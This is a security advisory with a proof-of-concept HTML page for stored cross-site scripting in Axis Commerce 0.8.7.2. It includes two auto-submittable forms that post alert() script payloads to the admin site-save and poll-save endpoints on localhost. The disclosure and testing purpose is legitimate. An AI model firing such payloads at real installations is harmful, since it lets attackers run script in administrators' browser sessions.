<!--

Axis Commerce 0.8.7.2 Remote Script Insertion Vulnerabilities


Vendor: Axis
Product web page: http://www.axiscommerce.com
Affected version: 0.8.7.2

Summary: Powerful open source ecommerce platform.

Desc: Axis Commerce suffers from multiple stored
XSS vulnerabilities when input passed via several
parameters to several scripts is not properly
sanitized before being returned to the user. This
can be exploited to execute arbitrary HTML and
script code in a user's browser session in context
of an affected site.

Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Apache 2.4.2 (Win32)
           PHP 5.4.4
           MySQL 5.5.25a


Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                              @zeroscience
              

Advisory ID: ZSL-2012-5115
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5115.php

https://github.com/axis/axiscommerce/issues/233


27.11.2012

-->


<html>
<head>
<title>Axis Commerce 0.8.7.2 Remote Script Insertion Vulnerabilities</title>
</head>
<body><center><br />

<form method="POST" action="http://localhost/axis/admin/core/site/batch-save">
<input type="hidden" name="data" value='{"2":{"id":"2",
                                        "name":"\"><script>alert('XSS');</script>",
                                        "base":"TEST_STRING",
                                        "secure":"TEST_STRING2",
                                        "root_category":"2"}}' />
<input type="submit" value="Go Site" />
</form><br />

<form method="POST" action="http://localhost/axis/admin/poll/save">
<input type="hidden" name="answer[-1][1]" value='"><script>alert(1);</script>' />
<input type="hidden" name="description[1]" value='"><script>alert(2);</script>' />
<input type="hidden" name="id" value="" />
<input type="hidden" name="sites" value="1" />
<input type="hidden" name="status" value="1" />
<input type="hidden" name="type" value="0" />
<input type="submit" value="Go Poll" />
</form>

</center></body>
</html>